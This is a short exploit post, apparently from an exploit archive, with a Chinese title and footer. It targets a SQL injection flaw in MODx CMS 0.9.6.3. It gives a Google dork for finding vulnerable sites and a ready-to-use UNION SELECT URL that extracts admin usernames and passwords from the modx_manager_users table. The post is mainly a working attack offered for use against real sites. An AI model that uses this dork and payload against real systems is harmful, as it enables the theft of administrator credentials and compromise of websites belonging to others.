最有前途的开源CMS SQL注入漏洞

# Exploit Title: Most Promising Open Source CMS SQL Injection Vulnerability
# Date: 25/07/2010
# Author: lucifer
# Software Link: http://modxcms.com//
# Version: 0.9.6.3
# Google dork :inurl:"index.php?id=null&parent=null"
# Platform / Tested on: windows
# Category: Expliot code
# Code : [SQL]

#BUG:#################################################################

After find plugin at sites run SQL Inject :

example : http://site.com/index.php?id=null&parent=null and 1=2 union select concat(0x7e,username,0x7e,password,0x7e) from modx_manager_users

######################################################################
Website : http://hi.baidu.com/bylucifer
######################################################################

文章目录